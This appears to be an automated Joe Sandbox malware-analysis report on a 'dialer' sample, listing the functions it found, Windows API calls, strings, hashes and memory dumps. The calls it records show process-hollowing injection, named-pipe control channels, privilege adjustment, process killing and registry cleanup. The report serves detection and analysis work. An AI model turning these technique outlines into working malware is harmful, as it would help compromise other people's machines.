Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd

Similarity

API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
String ID:
API String ID: 3197395349-0
Opcode ID: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
Instruction ID: b4aac9d01c3c23d33ff5c4e64b0eccd2606a1103a741ce8c082beaf0d3d465bb
Opcode Fuzzy Hash: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
Instruction Fuzzy Hash: FF419A32A15A419AE760DF24E4807AA7BF4FB45B98F90013AEA4D43F98DF38D518CB50

Function 00007FF78AB32078 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 128
filememorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCpyW.SHLWAPI ref: 00007FF78AB320AA
StrCatW.SHLWAPI ref: 00007FF78AB320B8
GetModuleHandleW.KERNEL32 ref: 00007FF78AB320C1
GetCurrentProcess.KERNEL32 ref: 00007FF78AB3210C
K32GetModuleInformation.KERNEL32 ref: 00007FF78AB32120
CreateFileW.KERNELBASE ref: 00007FF78AB32150
CreateFileMappingW.KERNELBASE ref: 00007FF78AB3217B
MapViewOfFile.KERNELBASE ref: 00007FF78AB3219F
lstrcmpiA.KERNEL32 ref: 00007FF78AB321EA
VirtualProtect.KERNELBASE ref: 00007FF78AB32221
VirtualProtect.KERNELBASE ref: 00007FF78AB3224F
CloseHandle.KERNELBASE ref: 00007FF78AB32258
CloseHandle.KERNEL32 ref: 00007FF78AB32261
FreeLibrary.KERNEL32 ref: 00007FF78AB3226A

Strings

C:\Windows\System32\, xrefs: 00007FF78AB3209B
.text, xrefs: 00007FF78AB321E3

Memory Dump Source

Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true

Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd

Similarity

API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
String ID: .text$C:\Windows\System32\
API String ID: 2721474350-832442975
Opcode ID: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
Instruction ID: fa9ef921285ca575cc0dd9c18b310f5371de72adb2889c21549583d03c19435b
Opcode Fuzzy Hash: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
Instruction Fuzzy Hash: A6519335B0AA42A2FB21EF51E85466BBBA0FB84B84FA44175DE4D03B94DF3CD409C720

Function 00007FF78AB32D84 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40
sleepfilepipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF78AB31C64: AllocateAndInitializeSid.ADVAPI32 ref: 00007FF78AB31CB3
Part of subcall function 00007FF78AB31C64: SetEntriesInAclW.ADVAPI32 ref: 00007FF78AB31D14
Part of subcall function 00007FF78AB31C64: LocalAlloc.KERNEL32 ref: 00007FF78AB31D24
Part of subcall function 00007FF78AB31C64: InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF78AB31D3A
Part of subcall function 00007FF78AB31C64: SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF78AB31D52
Part of subcall function 00007FF78AB31C64: CreateNamedPipeW.KERNELBASE ref: 00007FF78AB31D94

Sleep.KERNEL32 ref: 00007FF78AB32DA9
ConnectNamedPipe.KERNELBASE ref: 00007FF78AB32DB6
ReadFile.KERNELBASE ref: 00007FF78AB32DD9
WriteFile.KERNEL32 ref: 00007FF78AB32E07
Sleep.KERNEL32 ref: 00007FF78AB32E14
DisconnectNamedPipe.KERNELBASE ref: 00007FF78AB32E1D

Strings

M, xrefs: 00007FF78AB32DFA
\\.\pipe\dialerchildproc64, xrefs: 00007FF78AB32D91

Memory Dump Source

Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true

Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd

Similarity

API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
String ID: M$\\.\pipe\dialerchildproc64
API String ID: 2203880229-3489460547
Opcode ID: 1e8405c3ce3dc3a450943935d6232c4767fdbc18e1eae9273363d4fc7ca69f3e
Instruction ID: e8ca2ef1abcdab5c583838b92f43f69d931e893bd395d82d1398559793e05a80
Opcode Fuzzy Hash: 1e8405c3ce3dc3a450943935d6232c4767fdbc18e1eae9273363d4fc7ca69f3e
Instruction Fuzzy Hash: 27117721E19742A1F714EB51E4143BAEBA0FF54BA1FA44278D65E46ED4CF7CE448C720

Function 00007FF78AB3228C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
sleeppipefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF78AB31C64: AllocateAndInitializeSid.ADVAPI32 ref: 00007FF78AB31CB3
Part of subcall function 00007FF78AB31C64: SetEntriesInAclW.ADVAPI32 ref: 00007FF78AB31D14
Part of subcall function 00007FF78AB31C64: LocalAlloc.KERNEL32 ref: 00007FF78AB31D24
Part of subcall function 00007FF78AB31C64: InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF78AB31D3A
Part of subcall function 00007FF78AB31C64: SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF78AB31D52
Part of subcall function 00007FF78AB31C64: CreateNamedPipeW.KERNELBASE ref: 00007FF78AB31D94

Sleep.KERNEL32 ref: 00007FF78AB322B1
ConnectNamedPipe.KERNELBASE ref: 00007FF78AB322BE
ReadFile.KERNEL32 ref: 00007FF78AB322E1
Sleep.KERNEL32 ref: 00007FF78AB32302
DisconnectNamedPipe.KERNEL32 ref: 00007FF78AB3230B

Strings

\\.\pipe\dialercontrol_redirect64, xrefs: 00007FF78AB32299

Memory Dump Source

Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true

Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd

Similarity

API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
String ID: \\.\pipe\dialercontrol_redirect64
API String ID: 2071455217-3440882674
Opcode ID: e726fb2786c7da4def9263b705b77f3199000bde839af328c4a314f779c2dbfb
Instruction ID: 9085060b6f372e65205977c3eae1925a92fe2a913197041b96fe574a1ae0da80
Opcode Fuzzy Hash: e726fb2786c7da4def9263b705b77f3199000bde839af328c4a314f779c2dbfb
Instruction Fuzzy Hash: B4014420E09642B1F714BB51A80437AEBE0BF51BA1FA482B8D65B02DD4CF7CD448D720

Function 00007FF78AB32CC0 Relevance: 9.1, APIs: 6, Instructions: 58
memorysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF78AB32CDB
HeapAlloc.KERNEL32 ref: 00007FF78AB32CEF
GetProcessHeap.KERNEL32 ref: 00007FF78AB32CF8
HeapAlloc.KERNEL32 ref: 00007FF78AB32D06
K32EnumProcesses.KERNEL32 ref: 00007FF78AB32D21
Sleep.KERNEL32 ref: 00007FF78AB32D79

Memory Dump Source

Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true

Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd

Similarity

API ID: Heap$AllocProcess$EnumProcessesSleep
String ID:
API String ID: 3676546796-0
Opcode ID: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
Instruction ID: ee0d9b561c1554ba5b163c6a942a64de4ebf87e6e30e45d1ca52407d4b7eb013
Opcode Fuzzy Hash: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
Instruction Fuzzy Hash: 75218131E0A712A7F714AB56E45453AFAA1FB81B81FA48078DA4A07F64CF3DE854CB50

Function 00007FF78AB317F8 Relevance: 9.1, APIs: 6, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF78AB3180D
HeapAlloc.KERNEL32 ref: 00007FF78AB3181E

Part of subcall function 00007FF78AB314E4: GetProcessHeap.KERNEL32 ref: 00007FF78AB31517
Part of subcall function 00007FF78AB314E4: HeapAlloc.KERNEL32 ref: 00007FF78AB3152A
Part of subcall function 00007FF78AB314E4: GetProcessHeap.KERNEL32 ref: 00007FF78AB31538
Part of subcall function 00007FF78AB314E4: HeapAlloc.KERNEL32 ref: 00007FF78AB31549
Part of subcall function 00007FF78AB314E4: K32EnumProcesses.KERNEL32 ref: 00007FF78AB31563
Part of subcall function 00007FF78AB314E4: OpenProcess.KERNEL32 ref: 00007FF78AB31591
Part of subcall function 00007FF78AB314E4: K32EnumProcessModules.KERNEL32 ref: 00007FF78AB315B6
Part of subcall function 00007FF78AB314E4: ReadProcessMemory.KERNELBASE ref: 00007FF78AB315ED
Part of subcall function 00007FF78AB314E4: CloseHandle.KERNELBASE ref: 00007FF78AB31629
Part of subcall function 00007FF78AB314E4: GetProcessHeap.KERNEL32 ref: 00007FF78AB3163B
Part of subcall function 00007FF78AB314E4: HeapFree.KERNEL32 ref: 00007FF78AB31649
Part of subcall function 00007FF78AB314E4: GetProcessHeap.KERNEL32 ref: 00007FF78AB3164F
Part of subcall function 00007FF78AB314E4: HeapFree.KERNEL32 ref: 00007FF78AB3165D

OpenProcess.KERNEL32 ref: 00007FF78AB31865
TerminateProcess.KERNEL32 ref: 00007FF78AB31878
CloseHandle.KERNEL32 ref: 00007FF78AB31881
GetProcessHeap.KERNEL32 ref: 00007FF78AB31891

Memory Dump Source

Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true

Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd

Similarity

API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
String ID:
API String ID: 1323846700-0
Opcode ID: 5cc818aebe366c74c24883c76324c687b53e60aeb57db289d72e63b86dd9db26
Instruction ID: 08678ff370fff0796c95f418416159a1802abee3b9e8d0a8052e97f9d719fec2
Opcode Fuzzy Hash: 5cc818aebe366c74c24883c76324c687b53e60aeb57db289d72e63b86dd9db26
Instruction Fuzzy Hash: 93116021F0AA42A5FB18AF56A80006AEEE5BF89B94F688078DE0D03B55DE7DE445C710

Function 00007FF78AB319AC Relevance: 4.5, APIs: 3, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(?,?,?,00007FF78AB3110E), ref: 00007FF78AB319CA
IsWow64Process.KERNEL32(?,?,?,00007FF78AB3110E), ref: 00007FF78AB319E0
CloseHandle.KERNELBASE(?,?,?,00007FF78AB3110E), ref: 00007FF78AB319FB

Memory Dump Source

Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true

Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd

Similarity

API ID: Process$CloseHandleOpenWow64
String ID:
API String ID: 10462204-0
Opcode ID: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
Instruction ID: d756f7ae06c64bbe81abf78bf2b87e3183a25a1b7d49b4f4b5af41a97c19a69a
Opcode Fuzzy Hash: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
Instruction Fuzzy Hash: 09F06221B09B8292FB149F16B484126A6A0FB48BC1F948078DB4D43B48DF3CD445C700

Function 00007FF78AB32314 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF78AB32328: VerSetConditionMask.NTDLL ref: 00007FF78AB32397
Part of subcall function 00007FF78AB32328: VerSetConditionMask.NTDLL ref: 00007FF78AB323A8
Part of subcall function 00007FF78AB32328: VerSetConditionMask.NTDLL ref: 00007FF78AB323B9
Part of subcall function 00007FF78AB32328: VerifyVersionInfoW.KERNEL32 ref: 00007FF78AB323CC
Part of subcall function 00007FF78AB32328: GetCurrentProcessId.KERNEL32 ref: 00007FF78AB323DE
Part of subcall function 00007FF78AB32328: OpenProcess.KERNEL32 ref: 00007FF78AB323EE
Part of subcall function 00007FF78AB32328: OpenProcessToken.ADVAPI32 ref: 00007FF78AB3240F
Part of subcall function 00007FF78AB32328: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF78AB32429
Part of subcall function 00007FF78AB32328: AdjustTokenPrivileges.KERNELBASE ref: 00007FF78AB3246D
Part of subcall function 00007FF78AB32328: GetLastError.KERNEL32 ref: 00007FF78AB32477
Part of subcall function 00007FF78AB32328: CloseHandle.KERNELBASE ref: 00007FF78AB32480
Part of subcall function 00007FF78AB32328: FindResourceExA.KERNEL32 ref: 00007FF78AB32494
Part of subcall function 00007FF78AB32328: SizeofResource.KERNEL32 ref: 00007FF78AB324AB
Part of subcall function 00007FF78AB32328: LoadResource.KERNEL32 ref: 00007FF78AB324C4
Part of subcall function 00007FF78AB32328: LockResource.KERNEL32 ref: 00007FF78AB324D6
Part of subcall function 00007FF78AB32328: GetCurrentProcessId.KERNEL32 ref: 00007FF78AB324E3

ExitProcess.KERNEL32 ref: 00007FF78AB3231F

Memory Dump Source

Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true

Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd

Similarity

API ID: Process$Resource$ConditionMask$CurrentOpenToken$AdjustCloseErrorExitFindHandleInfoLastLoadLockLookupPrivilegePrivilegesSizeofValueVerifyVersion
String ID:
API String ID: 2329183550-0
Opcode ID: c424f5b466816f57c667fdb355f9c01d35ce1647c2c5f950e20106d890b0f394
Instruction ID: faee572af9e01b0e5c53a5e7136fcffc07371f700791b0ad390377ee7d8a2169
Opcode Fuzzy Hash: c424f5b466816f57c667fdb355f9c01d35ce1647c2c5f950e20106d890b0f394
Instruction Fuzzy Hash: 0EA01200E0A64151F70433B0640502C44907F50601FE004B4C00501541CE2C10048330

Non-executed Functions

Function 00007FF78AB326E8 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 292
memoryregistryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32 ref: 00007FF78AB3276B

Part of subcall function 00007FF78AB319AC: OpenProcess.KERNEL32(?,?,?,00007FF78AB3110E), ref: 00007FF78AB319CA
Part of subcall function 00007FF78AB319AC: IsWow64Process.KERNEL32(?,?,?,00007FF78AB3110E), ref: 00007FF78AB319E0
Part of subcall function 00007FF78AB319AC: CloseHandle.KERNELBASE(?,?,?,00007FF78AB3110E), ref: 00007FF78AB319FB

Part of subcall function 00007FF78AB310C0: OpenProcess.KERNEL32 ref: 00007FF78AB3112C
Part of subcall function 00007FF78AB310C0: OpenProcess.KERNEL32 ref: 00007FF78AB3114B
Part of subcall function 00007FF78AB310C0: K32GetModuleFileNameExW.KERNEL32 ref: 00007FF78AB31170
Part of subcall function 00007FF78AB310C0: PathFindFileNameW.SHLWAPI ref: 00007FF78AB3117E
Part of subcall function 00007FF78AB310C0: lstrlenW.KERNEL32 ref: 00007FF78AB3118A
Part of subcall function 00007FF78AB310C0: StrCpyW.SHLWAPI ref: 00007FF78AB311A1
Part of subcall function 00007FF78AB310C0: CloseHandle.KERNEL32 ref: 00007FF78AB311AD
Part of subcall function 00007FF78AB310C0: StrCmpIW.SHLWAPI ref: 00007FF78AB311ED
Part of subcall function 00007FF78AB310C0: NtQueryInformationProcess.NTDLL ref: 00007FF78AB31221
Part of subcall function 00007FF78AB310C0: OpenProcessToken.ADVAPI32 ref: 00007FF78AB3124B

RegOpenKeyExW.ADVAPI32 ref: 00007FF78AB32807
RegDeleteValueW.ADVAPI32 ref: 00007FF78AB3281F
ExitProcess.KERNEL32 ref: 00007FF78AB32843
GetProcessHeap.KERNEL32 ref: 00007FF78AB3284A
HeapAlloc.KERNEL32 ref: 00007FF78AB3285D
K32EnumProcesses.KERNEL32 ref: 00007FF78AB3287A
ExitProcess.KERNEL32 ref: 00007FF78AB3291A

Strings

SOFTWARE, xrefs: 00007FF78AB327F9
open, xrefs: 00007FF78AB32AEC
dialerstager, xrefs: 00007FF78AB32818

Memory Dump Source

Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true

Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd

Similarity

API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
String ID: SOFTWARE$dialerstager$open
API String ID: 3276259517-3931493855
Opcode ID: 57deca5b7dadaa8d94473ef24676dfbe4cb0f61227f20ab4b3d1e5920c79bf4c
Instruction ID: 0c56884ac4b1347b2a316815eb2df1e0f25d64bd969edcf236cb9c0a3ffc301d
Opcode Fuzzy Hash: 57deca5b7dadaa8d94473ef24676dfbe4cb0f61227f20ab4b3d1e5920c79bf4c
Instruction Fuzzy Hash: 06D1A631E0A682A6FB79AF6598042F9AAD5FF50744FE081B5E90D47E95DF3CE604C320

Function 00007FF78AB31DB4 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162
injectionthreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32 ref: 00007FF78AB31E78
VirtualAllocEx.KERNEL32 ref: 00007FF78AB31EA7
WriteProcessMemory.KERNEL32 ref: 00007FF78AB31ECC
WriteProcessMemory.KERNEL32 ref: 00007FF78AB31F08
VirtualAlloc.KERNEL32 ref: 00007FF78AB31F3B
GetThreadContext.KERNEL32 ref: 00007FF78AB31F57
WriteProcessMemory.KERNEL32 ref: 00007FF78AB31F7F
SetThreadContext.KERNEL32 ref: 00007FF78AB31F9D
ResumeThread.KERNEL32 ref: 00007FF78AB31FAD
OpenProcess.KERNEL32 ref: 00007FF78AB31FCC
TerminateProcess.KERNEL32 ref: 00007FF78AB31FDC

Strings

@, xrefs: 00007FF78AB31E9F

Memory Dump Source

Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true

Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd

Similarity

API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
String ID: @
API String ID: 3462610200-2766056989
Opcode ID: 703b8677555c06e2b0f299b5c9a482d004feef9bba7614f76242c0c17f04cdf7
Instruction ID: a2de70f42eb36b7f9d523e5d060635976f24346859cd455a32c052c79afa7ad6
Opcode Fuzzy Hash: 703b8677555c06e2b0f299b5c9a482d004feef9bba7614f76242c0c17f04cdf7
Instruction Fuzzy Hash: E161AC32B05A0196FB509F2AE84076EBBE5FB48B88F908179DE4D57B58DF38E445C360

Function 00007FF78AB31AC4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106memorycomCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00007FF78AB31AEB
SysAllocString.OLEAUT32 ref: 00007FF78AB31AFB
CoInitializeEx.OLE32 ref: 00007FF78AB31B08
CoInitializeSecurity.OLE32 ref: 00007FF78AB31B3F
CoCreateInstance.OLE32 ref: 00007FF78AB31B84
VariantInit.OLEAUT32 ref: 00007FF78AB31B96
CoUninitialize.OLE32 ref: 00007FF78AB31C2F
SysFreeString.OLEAUT32 ref: 00007FF78AB31C38
SysFreeString.OLEAUT32 ref: 00007FF78AB31C41

Strings

dialersvc64, xrefs: 00007FF78AB31AE2

Memory Dump Source

Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true

Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd

Similarity

API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
String ID: dialersvc64
API String ID: 4184240511-3881820561
Opcode ID: 1cf1482e3e3cd0594537fe81606e3316bc30941842e87169c6508401709d1003
Instruction ID: 51ebeff1711f82edfbbb82850e92d55ef5062f4b050b90bf6544c68a531cac62
Opcode Fuzzy Hash: 1cf1482e3e3cd0594537fe81606e3316bc30941842e87169c6508401709d1003
Instruction Fuzzy Hash: 45416F32B05B46A6FB10DF25E8442AE77B5FB88B89F948179DE0D47A24DF38D145C310

Function 00007FF78AB31000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FF78AB31034
RegDeleteKeyW.ADVAPI32 ref: 00007FF78AB31045
RegEnumKeyExW.ADVAPI32 ref: 00007FF78AB31082
RegCloseKey.ADVAPI32 ref: 00007FF78AB31093
RegDeleteKeyExW.ADVAPI32 ref: 00007FF78AB310B0

Strings

SOFTWARE\dialerconfig, xrefs: 00007FF78AB31026, 00007FF78AB3109C

Memory Dump Source

Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true

Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd

Similarity

API ID: Delete$CloseEnumOpen
String ID: SOFTWARE\dialerconfig
API String ID: 3013565938-461861421
Opcode ID: e1473c9d781940c188c1c4810ff800916bd5dc84dd697936dace2937510ea816
Instruction ID: f3172143c39075d9e7d9cdeb704391539103c47d3d2352287e8e5a3c9f2bd447
Opcode Fuzzy Hash: e1473c9d781940c188c1c4810ff800916bd5dc84dd697936dace2937510ea816
Instruction Fuzzy Hash: 6E11A722E19A8591FB609F24E8447FAA7A4FB44758F905279D64D0AD98CF3CD148CB24

Function 00007FF78AB32C18 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF78AB32C53
WriteFile.KERNEL32 ref: 00007FF78AB32C7B
WriteFile.KERNEL32 ref: 00007FF78AB32C9E
CloseHandle.KERNEL32 ref: 00007FF78AB32CA7

Strings

\\.\pipe\dialercontrol_redirect64, xrefs: 00007FF78AB32C30

Memory Dump Source

Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true

Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd

Similarity

API ID: File$Write$CloseCreateHandle
String ID: \\.\pipe\dialercontrol_redirect64
API String ID: 148219782-3440882674
Opcode ID: e51fa25a04711743f107767099e23b895b2e502b334cde0a5e9bfd5133e6eec8
Instruction ID: d4221b1e97c1137cf4286f51274e37c2dbe99c566c1d1cf98d8133934823e4ab
Opcode Fuzzy Hash: e51fa25a04711743f107767099e23b895b2e502b334cde0a5e9bfd5133e6eec8
Instruction Fuzzy Hash: 4F11A032F15B5092F7109B01E408369ABA0FB88FE0FA44279DA2D03B94CF7CD509C750

Function 00007FF78AB31A14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,00007FF78AB31914), ref: 00007FF78AB31A24
GetProcAddress.KERNEL32(?,?,00000000,00007FF78AB31914), ref: 00007FF78AB31A37

Strings

ntdll.dll, xrefs: 00007FF78AB31A1A

Memory Dump Source

Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true

Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ntdll.dll
API String ID: 1646373207-2227199552
Opcode ID: 2932c76e980009a225b48c98ed69798072b802092a4ae1a9bffd161348126381
Instruction ID: 1a08da25de2e50e8a2ee6ce82c4af2fd918b6696203f2198916f7ba43aecff7f
Opcode Fuzzy Hash: 2932c76e980009a225b48c98ed69798072b802092a4ae1a9bffd161348126381
Instruction Fuzzy Hash: 62D0A984F17A03A2FE08AB62685507287A0BF08B82BE844B4CE2E06B00DE2CD094C220

Analysis Process: powershell.exePID: 2872, Parent PID: 2580COMMON

Executed Functions

Function 00007FFD9B7FA0E5 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1823394258.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

